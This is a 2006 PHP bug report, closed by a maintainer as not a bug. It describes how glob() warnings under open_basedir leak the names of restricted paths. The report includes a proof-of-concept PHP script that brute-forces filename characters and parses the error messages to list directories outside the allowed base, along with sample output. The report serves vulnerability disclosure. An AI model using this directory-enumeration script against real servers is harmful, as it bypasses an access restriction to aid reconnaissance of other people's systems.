ID:               39339
Updated by:       [EMAIL PROTECTED]
Reported By:      anton dot kirsanov at gmail dot com
-Status:          Open
+Status:          Bogus
Bug Type:         Safe Mode/open_basedir
Operating System: ALL
PHP Version:      5.1.6
New Comment:

Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

Every time PHP fails to open a file due to safe_mode/open_basedir
it returns an error saying cannot open so & so due to safe_mode.
You don't gain the ability to write to files and/or open them, so
there is no security issue here.


Previous Comments:
------------------------------------------------------------------------

[2006-11-01 22:30:25] anton dot kirsanov at gmail dot com

Description:
------------
When open_basedir is enabled, the glob() function doesn't show files in
unallowed directories; however, the warning message contains the name of
the file or directory to which access is denied.
If you recursively parse the warning messages to extract paths, you get
a listing of unallowed directories (see POC code).

I tested this bug on PHP 5.1.6 and 4.4.4; the result is the same
everywhere.

Reproduce code:
---------------
<?php
// -----------------------------------------------------
// POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com )
//
// Description:
// Bug in the warning message for the glob() function allows listing
// unallowed directories when open_basedir is enabled.
//
// Risk:
// Possible directory listing, when open_basedir is enabled.
// Testing on PHP 4.4.4, 5.1.6.

error_reporting(E_ALL);
ini_set("display_errors", 0);
ini_set("track_errors", 1);

if(!ini_get('open_basedir')) die('open_basedir not present');

$chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$z = array();
get_c("/", $z); // show contents of root directory
print_r($z);

function get_c($path, &$o) {
    global $chars;
    for($i=0; $i < strlen($chars); $i++) {
        $p = $path . $chars[$i];
        $r = glob($p . "*");
        if(!$r && $php_errormsg) {
            if(( preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t) ||
                 preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t)) && !$o[$t[1]]) {
                $o[$t[1]] = $t[2];
                get_c($p, $o);
            }
        }
    }
}
?>

Expected result:
----------------
<?php
glob("/*");
?>

Warning: glob(): open_basedir restriction in effect. is not allowed to
access (/) owned ...

Actual result:
--------------
<?php
glob("/*");
?>

----
Warning: glob(): open_basedir restriction in effect. is not allowed to
access (/bin/) owned ...
----
The warning message has disclosed the path - /bin/


------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=39339&edit=1